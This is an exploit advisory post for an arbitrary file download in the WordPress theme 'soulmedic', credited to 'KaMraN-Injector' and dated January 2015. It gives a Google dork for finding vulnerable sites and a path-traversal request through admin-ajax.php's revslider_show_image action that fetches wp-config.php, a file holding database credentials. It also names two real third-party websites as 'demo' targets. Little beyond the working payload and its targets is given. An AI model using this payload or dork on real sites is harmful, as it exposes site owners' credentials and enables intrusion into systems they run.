facebook facebook twitter rss

WordPress theme soulmedic Arbitrary File Download Vulnerability

Author: KaMraN-Injector , Published: 02-01-2015
##############################################################
# Exploit Title: WordPress theme soulmedic Arbitrary File Download Vulnerability
#
# Exploit Author: KaMraN-Injector
#
# Discovered By: injector
#
# Dork 1: inurl:"/wp-content/themes/soulmedic/
#
# Date: 2 January 2015
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# Theme link: http://themeforest.net/item/soulmedic-flat-responsive-medical-health-theme/6282832
#
# platform: php
##############################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~

[~] http://www.Site.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


##############

demo 1: http://www.ec3health.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

demo 2: http://www.allcarefamilyservices.org/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

##############################################################
Contact number: +1 647 69 64 247
Contact mail: injector@rogers.com
official Website: Http://acc3ss.ir/

##############################################################

Like us on Facebook :